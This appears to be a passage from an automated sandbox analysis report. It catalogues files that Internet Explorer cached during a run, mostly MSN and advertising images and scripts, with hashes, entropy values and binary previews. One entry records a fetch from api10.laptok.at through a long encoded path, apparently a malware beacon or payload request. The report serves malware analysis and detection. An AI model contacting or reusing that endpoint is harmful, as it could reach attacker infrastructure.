Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.w7..@.t....'>....`..)wd...=x..%......1.j.....V.rl.+o.G...2.t`.....6..b.?..L.X7....uv.1...~...y....J..c[..7.o&0W..9...S...-~].....c...j+tV...f..5,........m.X...F.....AL.....].T9?@+..k...jpi&...a.J....?.D....].8...nt.i!rw. $d.0}9..Y.~.P7Zm.NF.c.z.0.S.U.U!2...O.NZI..r....>..7..l...L.a.p:V7.-.I.u......Z.hg'..Q.v=.1TH....b.....Q..n)qK.Z.n(.b.....b...E-...S..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1dBm65[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	12480
Entropy (8bit):	7.9496242589410695
Encrypted:	false
SSDEEP:	192:BYL5ZuikLsrhO8ivlpaykEWPQxE7SrIt3VLK4t88IWN2OOVE:eDudsr0lk5PSMt3VLK4+DW5qE
MD5:	360CC4C27611BF95C4CF33655808C1DB
SHA1:	EA274910A6A22E4DB1DF82113364C3C9F475478D
SHA-256:	C2772336726205F05B1240A4F8BCD30DA77178DFA5C990179536A0C239A47CFD
SHA-512:	3AC27452DEE614FDC5EE1D3EA3B9DFB93C61C20B0EFF1D9B53D57E7376AC481125C61685FA3D7167D09BBC70CBEA71E31BA420B1C61CEEB26C05FB1BB6CDA83F
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dBm65.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..,...a.........j.=.EB..K....Wy.c.,.......\.`H........x..8..........E..l..A.).+.21N.....b.+D>~.j.n...5>...~..\.-.14...4..J...B.}d?-Vrs....o4...Sc'4...i.")..P..9..jf.....;...4.=.PC..a.0".E.).....O.s@.....5l...g..I...K.5Y.t.c.........7..H.l8...kyt.....8..M.S.,....9.....q.+.........)..y..,d..[...N.N....V.M..l.)..q..@...z..4.n...Nk...Q..OZ.sB.....4P.*....p)."

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1dBn2F[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	downloaded
Size (bytes):	8244
Entropy (8bit):	7.943052613763091
Encrypted:	false
SSDEEP:	192:BFBU+meDfCwYZD3VcC4McwPnmPCUrhJTzsZ/Pmw4D+mrLPoi:v2GfmbFOaKnTImxzPoi
MD5:	FBC799CF0DE9895B480B5FDA07B9C699
SHA1:	2F6A73A1B5F8CE36D1C1716048E673BB75FCD4E4
SHA-256:	56D77538275EDBB6DB996B749EEEF00526C50FF79B9322CCDCC0AF2DC4D3A44F
SHA-512:	D17A4D62A9003616FA814E31AC690879C776641B874EBBF35C2244B9D64FBBC7982EEB22831D425832CE73B868B81C6C62BBF979A74C74B860AAEA701026D8BE
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dBn2F.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..>..=......WC.#.t.?0...:.A.@.5....9.S0L.<.....eb..k.J.Y{.2A<`...nA...5.H]..4...........p?....../..q..y..RW1..W..E.oRF..h}+r$...y=.k....(D.QG`+>.Lw....s;~.})..w.#=..a..QAa..?...=I'.V...w.K..ua.7...~....m.!......!...5j+vWVa..S.H.+.M.A3.w.}D.A.... .Qj...=.....k7......rq.'.=.Yi...Ek..>P.K.8..\|zF...P*..0.'.[CT... .$R.v.....x.....\i]].G..Gw...~VR.9.4.H..s+..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1dC041[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	downloaded
Size (bytes):	16981
Entropy (8bit):	7.95701655414084
Encrypted:	false
SSDEEP:	384:JOukg71LLJWa3EMtNfLadLGD10AD5CV0wMOb3QmJA5S:JOA1LVnUMq9uzdCnMO7Qr4
MD5:	8A8F5E2977075E096A0C18E2A2147EB6
SHA1:	171B70C188341485AAB259F549624EF12FFAA1F2
SHA-256:	587E77001574AB582B781F4B65F2D1CC21AB2F1DF5BF85D2CB96EC413FC5B069
SHA-512:	D09A499B130BBDD3723D871D1CFBDF20D58E813B2C6EEBC16678C7A07B14860DE05B6324009AED65922338D71D8DF9EEBF556C31CF4D707CACF411ED73E2BDC6
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dC041.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...t..".....r=.j..W....,N........s.$.$.@. 9..:.....r.A... ......7%\.....j.3R)..1.........V.F_:T..........M..7.N.Nr:.VtP_.<..H......+..~c'.T..hg.Q..>P[+w.@.p.a@...^.m..b[.Vd..^..{...m"..4k."^.......nrx.H.JME*,...pA.A....$c4....P.}r.D...d)s.............O7.Ad..26w....bx.......n..n.R.I.....\.e..}....Y.j...l.8..;R..N...0.Y.I64.Vq.c.....j...$...a.Q....;..t...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB7hg4[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	458
Entropy (8bit):	7.172312008412332
Encrypted:	false
SSDEEP:	12:6v/78/kFj13TC93wFdwrWZdLCUYzn9dct8CZsWE0oR0Y8/9ki:u138apdLXqxCS7D2Y+
MD5:	A4F438CAD14E0E2CA9EEC23174BBD16A
SHA1:	41FC65053363E0EEE16DD286C60BEDE6698D96B3
SHA-256:	9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
SHA-512:	FD41BCD1A462A64E40EEE58D2ED85650CE9119B2BB174C3F8E9DA67D4A349B504E32C449C4E44E2B50E4BEB8B650E6956184A9E9CD09B0FA5EA2778292B01EA5
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J...._IDAT8O.RMJ.@...&.....B%PJ.-.......... ...7..P..P....JhA..$Mf..j.n.~.y...}...:...b...b.H<.)...f.U...fs`.rL....}.v.B..d.15..\T..Z_..'.}..rc....(...9V.&.....\|.qd...8.j..... J...^..q.6..KV7Bg.2@).S.l#R.eE.. ..:_.....l.....FR........r...y...eIC......D.c......0.0..Y..h....t....k.b..y^..1a.D..\|...#.ldra.n.0.......:@.C.Z..P....@...*......z.....p....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBIbVOm[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	795
Entropy (8bit):	7.615715234096511
Encrypted:	false
SSDEEP:	12:6v/78/W/6TUdZVAZD/rc+c/AGljTpHqd2zBMrsLlZBYVWyMrnqEO03AGjfjjt7:U/6oYt/RcVl3pH822cRyMrnG03dx7
MD5:	0B075168CF2D19C936A0BF1A34ADE0F0
SHA1:	429B62EEB83C1B128700DC025F68599425BC5552
SHA-256:	39CA855FDCA2C76CDFA82B17AE0331D2B24D84029E16F8347DACBE2E02818138
SHA-512:	4AC96302CCC33EABF482360B6D2EB2B26FDD7959574036A75B324344A5901F1888DABA0F1893CB2DE8F0276F0FCBC25CE832171497DCDC29018BBD07684395C3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBIbVOm.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8OuS.KTQ......8.`..FV&a.BGP..\.n..Ei_..iBD...h.(.hQZ-Z..q!.}....-"...4.r..x...w....s....... T~.'..).kd..D.$go....S.C...+..h.H..[.f.C.#..lp..&Cih..}...e.....@@.....'.^f(p.gZ.#..HOJ.+qH...tV%....`..xZ.Q....pe[5E.2.C$R... .0.N..../.u...2.?W.....H&.D%kQ...`Q...G...i...!.%..W.........2.I..o..h?..L..W.s...hBi[#....\....\|..(i.S.p..1z.....SD..B.m..<&.....-......z+.6.-V5...7m...&V.\|....)...s:._..,m..}....e......T.=y..<..4Ms...$..u..I....~....].r.@j9...W07<.(.c.G...Z....o#...,.B.h..-.....{130.h....._R@+A;I0..k;8.6\|...Om.!Y.6........\\..{:Y.zF.R....wg..z......pF..sZ$.H.._...u.mT.......:V3.....;@...&..Y..+..NNw.D..a..B..W."..=.).....4....=....T.(.J......e..w....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBXXVfm[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	823
Entropy (8bit):	7.627857860653524
Encrypted:	false
SSDEEP:	24:U/6IPdppmpWEL+O4TCagyP79AyECQdYTVc6ozvqE435/kc:U/6Ilpa4T/0IVKdI1
MD5:	C457956A3F2070F422DD1CC883FB4DFB
SHA1:	67658594284D733BB3EE7951FE3D6EE6EB39C8E2
SHA-256:	90E75C3A88CD566D8C3A39169B1370BBE5509BCBF8270AF73DB9F373C145C897
SHA-512:	FE9D1C3F20291DFB59B0CEF343453E288394C63EF1BE4FF2E12F3F9F2C871452677B8346604E3C15A241F11CC7FEB0B91A2F3C9A2A67E446A5B4A37D331BCEA3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBXXVfm.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.SKH.a....g.....E..j..B7..B..... .L)q.&t..\EA. A.. D.. 7..M.(#A.t\|&..z.3w.....Zu.;s.9.;................i.o.P.:....D.+...!.....4.g.J..W..F.mC..%tt0I.j..J..kU.o...0.....qk4....!>.>...;...Q..".5$..oaX..>..:..Ebl..;.{s...W.v..#k}].)}......U.'....R..(..4..n..dp......v.@!..^G0....A..j.}..h+..t.....<..q...6.8.jG......E%...F.......ZT....+....-.R.....M.. .A.wM........+.F}.....`-+u....yf..h,.KB.0......;I.'..E.(...2VR;.V...u...cM..}....r\.!.J>%......8f"....q.\|...i..8..I1..f.3p.@ $a.k.A...3..I.O.Dj...}..PY.5`...$..y.Z..t... ...\|.E.zp............>f..<z.If...9Z;....O.^B.Q..-.C....=.......v?@).Q..b...3....`.9d.D5.......X.....Za.......!#h.. \&s....M3Qa..%.p..\1..xE.>..-J.._........?..?5e......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\FjzX0u4[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	340072
Entropy (8bit):	5.999887707873421
Encrypted:	false
SSDEEP:	6144:bC6ujxo+cJlx7hRyZxW3LpRmknPMD8PK7WP3Xm7sn1bujmOfKzCzpqK:bC6ujxStCG3/mAkDI30sn1bQSzCMK
MD5:	A7025BC8EA3D88D08B270804C08CF752
SHA1:	7FBC8FFE4D1E88A3F5A2596646C46F0894EA6859
SHA-256:	B286140BFAA8D001860C9E1F0F49A8626BD1DB05C30693BD317CCB613F21DC0C
SHA-512:	0BA0E3DE6F299E78FBA72F48F15D181885C98C62CF346046BFAEFE8743D441187D887ADD8A91BBBD483C2AD984AFE2E87CE3339AA089250E4AA7CAA98E6F1586
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/JQsoHKJSB/rNdVJ_2ByIK2QDFJR2qj/j2rw6DMd2f1e8eX8Ymg/9u0LouY1o0qnmocJ9nvfxr/XWjhEhDNEaQ_2/FYjjcA0h/eSTxi0np2M3GkDMJDUmRsAx/UvQhMAtYfw/bHvbHCpgIxEwn0SZp/LrrAt8U21M_2/BpEUbP2CORo/UW2pHsPHTDkzWu/mBoET9UfbltaF6qE6vcC1/04nY6eMBCYxT6Jao/ppmN_2FO5sKlIZe/z_2BFpIddjhGIg8u2_/2BrPbB1qq/eH44l_2FjBBiq9Kt9ByU/r3_2FcOIEGEvR4XQZpv/b5bozqpj7Ty6A4nci6CZa8/UAjk867qSAa/FjzX0u4
Preview:	D8cvpme4kK7HZ8SeM1l5pa/WQP2Bpx5V/LO2VThbCw6MubcBndEckfm7NRGvCjquQ6c4Lqe4clg38Ijxu8VmLld6lJw7DFNpBQIWYJOT9ibSBRgicRG1LKJB4YkULd8MLS9LuYgW/HzNO8W4UQqAYPOfsA9QK7TXUWZEDHgRvQi7Nu7reb/Wl1G+BlIzq91tG33cM8yhDW5NrNV3WIYe1N3At28ya4Ow9rOrxB31iKncAGF8tq0EWXUNbfgYj0Lu6fsvzuIE8ESESjYlrczZ3RSFRl7UjpT2yYSaWZtSAOuxSs4gjB8YS9cx9Xq8HC00WIs0ppwLj9ABywGZKLokpKhGr+7VIx03wAqULz8vWOiykXvfdLhwNID6jVcmoF4bLLDESDYQ2evuzcHYHd+6mErQPisV3PlCrwA3xP4LDkGc+OjGgDoExUf3eBViWNG1Fc6s0/nYiLsr7UVsiO37oqjNgjFzZEu6bj2X23PWoUBMsjNKyKji73UfsZO1i0cPPrAh2SS5ZBO8a4Ccoxq3taLhC9zwJoLWiMIVYDiXVYOYM7rLJFEcMZA9afrRRVsAlcXT8oj3noNmBJ1ZMhD6x0J2h0zD6ieu4317+BXchrUdUcBbDYd+Pz0TLWp70IN1YIyX3PjpDibIOJyz4sy4yW5S1nmfiNPNriAAKDvEF4a1pa/oZABqcmijxwDnaK+6CzbDErMg3rqmS6g0cE1ckeuZuYP30uxkp+C1s4cDF7jlgjdrLeSjV/NBlngdPL9EQNICbUwehC0FZk2UFc1BamHXhQEYxX9E94hj8EA5DyXjUUsLQxpbE1G+Z7pRySVcgHQ2Q4J9ywsE7PRFj45rUJjeIpsV0KVandXZICqaeFu7vz9R5/SnY1trMGBELM0WZMz7Cj4zUp42SFPx4/v7e8v1i3BioudUd55SOcXV4dI4aHx614PLAD017Gk12SL7DiitIQIBnptKPbuWpeyEtjVGm+FhzZ2ZNcWCbZlL

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\a8a064[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 28 x 28
Category:	downloaded
Size (bytes):	16360
Entropy (8bit):	7.019403238999426
Encrypted:	false
SSDEEP:	384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
MD5:	3CC1C4952C8DC47B76BE62DC076CE3EB
SHA1:	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
SHA-256:	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
SHA-512:	5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Preview:	GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........\|~\|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........\|~\|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\fcmain[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	38204
Entropy (8bit):	5.071506747172937
Encrypted:	false
SSDEEP:	768:+1avn4u3hPPsW94h8yNaEUyOYXf9wOBEZn3SQN3GFl295o1l7GBblLsI2:aQn4uRcWmh8yNHUFYXf9wOBEZn3SQN38
MD5:	D472DF137EB77579887D52523FAE1618
SHA1:	BFB420F801274DB668F10DC32E9EE30D5BD2EB95
SHA-256:	0A3FACBA7C3E52AFF37FD4AD39D9EBD8E42DC3CFAAE460572DB3D9BCC4163369
SHA-512:	3982EDD372D66DFA7CAED3EC2A9E60EEAA7F4417F141CDC8098C4CE21E1E436B87221BA493A9CCF351550231B4384F5C125DC60DCAA2E55BD8678DDAFCD84305
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1613090824643580082&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1613090824643580082","s":{"_mNL2":{"size":"306x271","viComp":"1613090824643580082","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305235","l2ac":"","sethcsd":"set!N7\|983"},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1613090824643580082\")) \|\| (parent._mNDetails[\"locHash\"] && paren

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_240cd6704ea9967dbd560c4f16998aa8[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	16917
Entropy (8bit):	7.962323018445536
Encrypted:	false
SSDEEP:	384:jWRv+dLEVDYD+cgwj37LQ1SOc6L1Fl5qZIpQW3/6:jOksMZLLQ1SJQTlw526
MD5:	AEBE46836597DAEC6BCB2EDF00C2A34C
SHA1:	13DF8D82BBEFE1C38C25DE82FE297C6E4B7A8DC7
SHA-256:	19FBD13ED493450379222BE6DA574F14EABFA05A8535C1A49EB206846BB4DB6F
SHA-512:	49C013CE1B0E93C98F1FEAC5B8C6E9E48ADB97DD93283DB1DC16897CBBEC19F6286CD378D2F19193307F7087A01FAE82F66325606898CA6A4742A6AAC1F34614
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_566%2Cy_258/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F240cd6704ea9967dbd560c4f16998aa8.png
Preview:	......JFIF.....................................................................&""&0-0>>T.............................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........7...............6...........................................................................x..%]..................s.8..w..R..3..X.....{g^,@....Jtz~\|c..b@..Q..;.{......k..,.ta.[<.........q..... ....j6To.a.....~Ou.y....81O.U...1.J."...../...K_>..."....V.X.q...<<.....D.* . ..p.m...K.1..DQ.1...........;.A... ."TA.A..h....r....3.S.b2.<..[.p.a}]^D..?.q..`.A.A.....).....1^....{'.w.m.q..K.-.....A.I......A.A.......nt....\|=.xn.]..7..V..mcg.U.........A.{...{..K..}].c....4....i..yU.'O.}..l......o..W.>...."."..G..<%..05.G.Tu..V5t...^..;...{.b/.;Vl....zGk...a.x.....PD.)...;........swO..D..Yr..\.I.PDf..F.<v.Y....=$.eA..F.8.M........Y..k&.C..m.......y...^~Y....6~Q.e\A<..q.]..c.Z..FXA..W..nf.....;:....:.c...=.Rk.fZ.....z.....Lk.F..G..;1...xx[4..^..8=O.Y.c.A.m...>.@.-?.`<..c.__.\|.A:._.......z\.Ws.m........N....x

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_3e4db03aeb27326fa409d0201601c66d[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	10928
Entropy (8bit):	7.956030588292682
Encrypted:	false
SSDEEP:	192:L6zlqp97Pzn186KnXg5acKZ4KdQiTD/DetwAIM/6c+8MefqXlS5UiG:OJeZzJ+y4QiTD/DeH/63GiV6+
MD5:	0C1A16B7BE63A652982673F6557DC826
SHA1:	57270462703461486071ABBA8C09E0A4D763AC81
SHA-256:	708CCCB9C1594400AC6F3AD998B498A9EEDCC50A8A6194EA633C9DC6D656B139
SHA-512:	2D0937F8E4547A895BAFACF1644CC7F465F5D081BF4B600ABDC8C7A275E69B335A0A4C5452DFFBE1CB1A8F6C62FFEB2D1CFF672755764F3B3274A0140E47842F
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F3e4db03aeb27326fa409d0201601c66d.jpg
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C.......)..)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW......7.....................................................................................oCk..9\..`. v..../D.Hs5 .4..Vu=@..1..g.A.....Y.....HV5cN....jy..k..........b.@..8...K........N..&...\.N:..WT.0..I..q8z.4...&fP...5\|..p.51J...).....(>.Q.\...e....(.L..k...v.Q..5...F.jL..A.....z.@u.....[+....AhG......c.......VR.&a.x\..d......}...:......4.2.A..3N;B.Z1...\.T....8..^....v.]...R.o.;.1....}..7VE....2.....V.&;P...9.R]>....UY.zn6...Ej........(Md....JBMX........T...>.%.^.1.af.w..Y.M.ft........a....Rc..9..jj.N~....Nl..BW;f.......O...g-..PY.f...6...@..k..\|.u....E.N.>.m\.1..@...C.(-r..D.".C..f....y.*Y..K.S=-3.. @.......:.....xsb.Z.;.^.3{..<.<...Y\...........4.. .BZ.d.....}W..yG..~..`o.w.\.$.. @.....VcQ...A@.Z....Kx.;9#k.5..G.1...... @.`.>Z..OK.i#..'..O....i...w........... .8.....A.....?...f...,Zg.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\location[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	182
Entropy (8bit):	4.685293041881485
Encrypted:	false
SSDEEP:	3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
MD5:	C4F67A4EFC37372559CD375AA74454A3
SHA1:	2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
